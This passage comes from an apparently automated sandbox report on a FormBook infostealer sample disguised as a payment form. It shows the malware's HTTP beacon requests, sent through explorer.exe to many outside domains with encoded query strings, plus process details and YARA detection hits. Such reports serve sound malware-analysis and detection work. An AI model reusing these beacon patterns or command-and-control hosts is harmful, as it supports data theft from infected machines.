                                                                                Data Raw: 34 30 30 0d 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 76 61 72 20 56 5f 50 41 54 48 3d 22 2f 22 3b 77 69 6e 64 6f 77 2e 6f 6e 65 72 72 6f 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 20 72 65 74 75 72 6e 20 74 72 75 65 3b 20 7d 3b 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 3c 74 69 74 6c 65 3e e6 be b3 e9 97 a8 e5 a8 81 e5 88 a9 e6 96 af e4 ba ba 37 38 38 5f 76 6e 73 63 33 37 37 35 e5 a8 81 e5 b0 bc e6 96 af e5 9f 8e e5 ae 98 e7 bd 91 5b e7 99 bb e5 85 a5 e5 b9 b3 e5 8f b0 5d 3c 2f 74 69 74 6c 65 3e 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 26 23 34 37 3b 26 23 31 30 36 3b 26 23 31 31 33 3b 26 23 31 31 37 3b 26 23 31 30 31 3b 26 23 31 31 34 3b 26 23 31 32 31 3b 26 23 34 36 3b 26 23 31 30 39 3b 26 23 31 30 35 3b 26 23 31 31 30 3b 26 23 34 36 3b 26 23 31 30 36 3b 26 23 31 31 35 3b 22 20 72 65 6c 3d 22 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 26 23 78 32 66 3b 26 23 78 37 34 3b 26 23 78 36 61 3b 26 23 78 32 65 3b 26 23 78 36 61 3b 26 23 78 37 33 3b 22 20 72 65 6c 3d 22 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 27 6d 61 69 6e 27 3e 0a 3c 69 3e 3c 68 32 3e 53 6f 6d 65 74 68 69 6e 67 20 65 72 72 6f 72 3a 3c 2f 68 32 3e 3c 2f 69 3e 0a 3c 70 3e 3c 68 33 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 33 3e 3c 68 33 3e 3c 66 6f 6e 74 20 63 6f 6c 6f 72 3d 27 72 65 64 27 3e 4e 6f 20 73 75 63 68 20 66 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 2e 3c 2f 66 6f 6e 74 3e 3c 2f 68 33 3e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 68 65 63 6b 20 6f 72 20 3c 61 20 68 72 65 66 3d 27 6a 61 76 61 73 63 72 69 70 74 3a 6c 6f 63 61 74 69 6f 6e 2e 72 65 6c 6f 61 64 28 29 27 3e 74 72 79 20 61 67 61 69 6e 3c 2f 61 3e 20 6c 61 74 65 72 2e 3c 2f 70 3e 0a 3c 64 69 76 3e 68 6f 73 74 6e 61 6d 65 3a 20 53 65 72 76 65 72 3c 2f 64 69 76 3e 3c 68 72 3e 0a 3c 64 69 76 20 69 64 3d 27 70 62 27 3e 47 65 6e 65 72 61 74 65 64 20 62 79 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 64 6e 62 65 73 74 2e 63 6f 6d 2f 3f 63 6f 64 65 3d 34 30 34 27 20 74 61 72 67 65 74 3d 5f 62 6c 61 6e 6b 3e 6b 61 6e 67 6c 65 2f 33 2e 35 2e 31 36 2e 34 3c 2f 61 3e 2e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 21 2d 2d 20 70 61 64 64 69 6e 67 20 66 6f 72 20 69 65 20 2d 2d 3e 3c 21 2d 2d 20 70 61 64 64 69 6e 67 20 66 6f 72 20 69 65 20 2d 2d 3e 3c 21 2d 2d 20 70 61 64 64 69 6e 67 20 66 6f 72 20 69 65 20 2d 2d 3e 3c 21 2d 2d 20 70 61 64 64 69 6e 67 20 66 6f 72 20 69 65 20 2d 2d 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 400<html><head><head><script>var V_PATH="/";window.onerror=function(){ return true; };</script><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><title>788_vnsc3775[]</title><script language="javascript" type="text/javascript" src="&#47;&#106;&#113;&#117;&#101;&#114;&#121;&#46;&#109;&#105;&#110;&#46;&#106;&#115;" rel="nofollow"></script><script language="javascript" type="text/javascript" src="&#x2f;&#x74;&#x6a;&#x2e;&#x6a;&#x73;" rel="nofollow"></script></head><body><div id='main'><i><h2>Something error:</h2></i><p><h3>404 Not Found</h3><h3><font color='red'>No such file or directory.</font></h3></p><p>Please check or <a href='javascript:location.reload()'>try again</a> later.</p><div>hostname: Server</div><hr><div id='pb'>Generated by <a href='https://www.cdnbest.com/?code=404' target=_blank>kangle/3.5.16.4</a>.</div></div>... padding for ie -->... padding for ie -->... padding for ie -->... padding for ie --></body></html>0


                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                16192.168.2.64977334.98.99.3080C:\Windows\explorer.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                Aug 3, 2021 16:19:04.396164894 CEST6906OUTGET /6mam/?wbYpSP=YkvzQHb0u0mjzgqcdkfc2nlAC0Yzm929bCO8fEJzAgzkJ6Iw6dVqaRJYZU+TtwSY8fdaCDocnA==&PJEt=HRR0_XgHGBD8 HTTP/1.1
                                                                                Host: www.kilbyrnefarm.com
                                                                                Connection: close
                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                Data Ascii:
                                                                                Aug 3, 2021 16:19:04.509962082 CEST6907INHTTP/1.1 403 Forbidden
                                                                                Server: openresty
                                                                                Date: Tue, 03 Aug 2021 14:19:04 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 275
                                                                                ETag: "61048812-113"
                                                                                Via: 1.1 google
                                                                                Connection: close
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                17192.168.2.64977486.105.245.6980C:\Windows\explorer.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                Aug 3, 2021 16:19:09.548891068 CEST6908OUTGET /6mam/?wbYpSP=5npnSCZ0ck9LfxTaUtRZHwWauGngCjsEHbJTec35d6ZUl1gSnMY6WOunSeDfnMtC3HJRIA/gUg==&PJEt=HRR0_XgHGBD8 HTTP/1.1
                                                                                Host: www.dragonshipping.com
                                                                                Connection: close
                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                Data Ascii:
                                                                                Aug 3, 2021 16:19:09.600625992 CEST6909INHTTP/1.1 302 Found
                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                Date: Tue, 03 Aug 2021 14:19:09 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Set-Cookie: PHPSESSID=9sb9ekuf90658gd9ivjuhv4oip; path=/
                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                Pragma: no-cache
                                                                                location: /
                                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 1 0


                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                18192.168.2.64977535.186.238.10180C:\Windows\explorer.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                Aug 3, 2021 16:19:14.630342960 CEST6909OUTGET /6mam/?wbYpSP=djxA7LmI8yOR5lrxItMqg4jKcWhO49sHA38/CyXgFoUCakRbVREb3j6xA5Z01WfJADXfd3zybw==&PJEt=HRR0_XgHGBD8 HTTP/1.1
                                                                                Host: www.mylifeinpark.com
                                                                                Connection: close
                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                Data Ascii:
                                                                                Aug 3, 2021 16:19:14.746182919 CEST6910INHTTP/1.1 403 Forbidden
                                                                                Server: openresty
                                                                                Date: Tue, 03 Aug 2021 14:19:14 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 275
                                                                                ETag: "60f9a3cb-113"
                                                                                Via: 1.1 google
                                                                                Connection: close
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                19192.168.2.649776154.215.87.12080C:\Windows\explorer.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                Aug 3, 2021 16:19:29.357628107 CEST6911OUTGET /6mam/?wbYpSP=Dhv3NEq4M+QwROw+dIik/SqBuvIY1/ydOcQwMfpHsV2StOMLf1p+AXWBQfK1e2Gy8MhXWnKhDQ==&PJEt=HRR0_XgHGBD8 HTTP/1.1
                                                                                Host: www.delhibudokankarate.com
                                                                                Connection: close
                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                Data Ascii:


                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                2192.168.2.64975934.102.136.18080C:\Windows\explorer.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                Aug 3, 2021 16:17:20.471642971 CEST6880OUTGET /6mam/?wbYpSP=oQhTdcG1kNI9/Lmcc2Ae/5c2EVHHJUmgpucHXQ4UdnJs0zjkXV1wGSuIEzpJIo84TCfrKzWPPA==&PJEt=HRR0_XgHGBD8 HTTP/1.1
                                                                                Host: www.beastninjas.com
                                                                                Connection: close
                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                Data Ascii:
                                                                                Aug 3, 2021 16:17:20.586126089 CEST6880INHTTP/1.1 403 Forbidden
                                                                                Server: openresty
                                                                                Date: Tue, 03 Aug 2021 14:17:20 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 275
                                                                                ETag: "61048812-113"
                                                                                Via: 1.1 google
                                                                                Connection: close
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                3192.168.2.64976023.27.129.11580C:\Windows\explorer.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                Aug 3, 2021 16:17:31.564062119 CEST6881OUTGET /6mam/?wbYpSP=2ekFb54j3d1mky1ioMZXLX6Zs25on60VYd2MbHSx0a3rFw0M4/d2RTsPPkjiG9H4TZ6139bXkw==&PJEt=HRR0_XgHGBD8 HTTP/1.1
                                                                                Host: www.importexportasia.com
                                                                                Connection: close
                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                Data Ascii:


                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                4192.168.2.64976134.98.99.3080C:\Windows\explorer.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                Aug 3, 2021 16:17:37.135760069 CEST6882OUTGET /6mam/?wbYpSP=YkvzQHb0u0mjzgqcdkfc2nlAC0Yzm929bCO8fEJzAgzkJ6Iw6dVqaRJYZU+TtwSY8fdaCDocnA==&PJEt=HRR0_XgHGBD8 HTTP/1.1
                                                                                Host: www.kilbyrnefarm.com
                                                                                Connection: close
                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                Data Ascii:
                                                                                Aug 3, 2021 16:17:37.249469042 CEST6883INHTTP/1.1 403 Forbidden
                                                                                Server: openresty
                                                                                Date: Tue, 03 Aug 2021 14:17:37 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 275
                                                                                ETag: "61048812-113"
                                                                                Via: 1.1 google
                                                                                Connection: close
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                5192.168.2.64976286.105.245.6980C:\Windows\explorer.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                Aug 3, 2021 16:17:42.360260010 CEST6883OUTGET /6mam/?wbYpSP=5npnSCZ0ck9LfxTaUtRZHwWauGngCjsEHbJTec35d6ZUl1gSnMY6WOunSeDfnMtC3HJRIA/gUg==&PJEt=HRR0_XgHGBD8 HTTP/1.1
                                                                                Host: www.dragonshipping.com
                                                                                Connection: close
                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                Data Ascii:
                                                                                Aug 3, 2021 16:17:42.403304100 CEST6884INHTTP/1.1 302 Found
                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                Date: Tue, 03 Aug 2021 14:17:42 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Set-Cookie: PHPSESSID=df77ft85npmaafcrhvv81nvoia; path=/
                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                Pragma: no-cache
                                                                                location: /
                                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 1 0


                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                6192.168.2.64976335.186.238.10180C:\Windows\explorer.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                Aug 3, 2021 16:17:47.490041971 CEST6885OUTGET /6mam/?wbYpSP=djxA7LmI8yOR5lrxItMqg4jKcWhO49sHA38/CyXgFoUCakRbVREb3j6xA5Z01WfJADXfd3zybw==&PJEt=HRR0_XgHGBD8 HTTP/1.1
                                                                                Host: www.mylifeinpark.com
                                                                                Connection: close
                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                Data Ascii:
                                                                                Aug 3, 2021 16:17:47.603698015 CEST6885INHTTP/1.1 403 Forbidden
                                                                                Server: openresty
                                                                                Date: Tue, 03 Aug 2021 14:17:47 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 275
                                                                                ETag: "60f9a3c0-113"
                                                                                Via: 1.1 google
                                                                                Connection: close
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                7192.168.2.649764154.215.87.12080C:\Windows\explorer.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                Aug 3, 2021 16:18:02.262365103 CEST6887OUTGET /6mam/?wbYpSP=Dhv3NEq4M+QwROw+dIik/SqBuvIY1/ydOcQwMfpHsV2StOMLf1p+AXWBQfK1e2Gy8MhXWnKhDQ==&PJEt=HRR0_XgHGBD8 HTTP/1.1
                                                                                Host: www.delhibudokankarate.com
                                                                                Connection: close
                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                Data Ascii:


                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                8192.168.2.64976564.190.62.11180C:\Windows\explorer.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                Aug 3, 2021 16:18:07.727356911 CEST6888OUTGET /6mam/?wbYpSP=L6FmBYjymbItbbnnjd7yzq8hOevfuspHLpHNfkA4yzrvipy3lucWli1gmvwrFafR77bKFMYeeA==&PJEt=HRR0_XgHGBD8 HTTP/1.1
                                                                                Host: www.vavasoo.com
                                                                                Connection: close
                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                Data Ascii:
                                                                                Aug 3, 2021 16:18:07.778529882 CEST6889INHTTP/1.1 302 Found
                                                                                date: Tue, 03 Aug 2021 14:18:07 GMT
                                                                                content-type: text/html; charset=UTF-8
                                                                                content-length: 0
                                                                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_RiU++kCshU1cpREzJib42Sw4YyFRH0ckQPHFCFmNVB14W1M2Ayhd1RibahQovNcO6UJ7P6dr/zvuUlXocRoB5A==
                                                                                expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                pragma: no-cache
                                                                                last-modified: Tue, 03 Aug 2021 14:18:07 GMT
                                                                                location: https://sedo.com/search/details/?partnerid=324561&language=it&domain=vavasoo.com&origin=sales_lander_1&utm_medium=Parking&utm_campaign=offerpage
                                                                                x-cache-miss-from: parking-58759dfcb5-fg79f
                                                                                server: NginX
                                                                                connection: close


                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                9192.168.2.64976634.102.136.18080C:\Windows\explorer.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                Aug 3, 2021 16:18:17.907407045 CEST6890OUTGET /6mam/?wbYpSP=44unMI1Q/kB3N4iH8WCIjTNIPpmavX0UQR770OieCBmDyTCieL+ZZdhYfwuEfVyDA+gWGsSDYQ==&PJEt=HRR0_XgHGBD8 HTTP/1.1
                                                                                Host: www.schoolfrontoffice.com
                                                                                Connection: close
                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                Data Ascii:
                                                                                Aug 3, 2021 16:18:18.021646023 CEST6891INHTTP/1.1 403 Forbidden
                                                                                Server: openresty
                                                                                Date: Tue, 03 Aug 2021 14:18:17 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 275
                                                                                ETag: "6104831f-113"
                                                                                Via: 1.1 google
                                                                                Connection: close
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                Code Manipulations

                                                                                Statistics

                                                                                Behavior

                                                                                Click to jump to process

                                                                                System Behavior

                                                                                Analysis Process: Form_TT_EUR57,890.exe PID: 6840 Parent PID: 5884

                                                                                General

                                                                                Start time:16:15:18
                                                                                Start date:03/08/2021
                                                                                Path:C:\Users\user\Desktop\Form_TT_EUR57,890.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:'C:\Users\user\Desktop\Form_TT_EUR57,890.exe'
                                                                                Imagebase:0x400000
                                                                                File size:702464 bytes
                                                                                MD5 hash:811EA41E60760A97B5F28973618728FE
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:Borland Delphi
                                                                                Yara matches:
                                                                                • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000001.00000003.362637084.0000000002DC4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                                • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000001.00000003.362921408.0000000002D88000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                                Reputation:low

                                                                                Analysis Process: logagent.exe PID: 5784 Parent PID: 6840

                                                                                General

                                                                                Start time:16:15:38
                                                                                Start date:03/08/2021
                                                                                Path:C:\Windows\SysWOW64\logagent.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:C:\Windows\System32\logagent.exe
                                                                                Imagebase:0x1d0000
                                                                                File size:86016 bytes
                                                                                MD5 hash:E2036AC444AB4AD91EECC1A80FF7212F
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.513499123.0000000004600000.00000040.00000001.sdmp, Author: Joe Security
                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.513499123.0000000004600000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.513499123.0000000004600000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.380848795.0000000010410000.00000040.00000001.sdmp, Author: Joe Security
                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.380848795.0000000010410000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.380848795.0000000010410000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
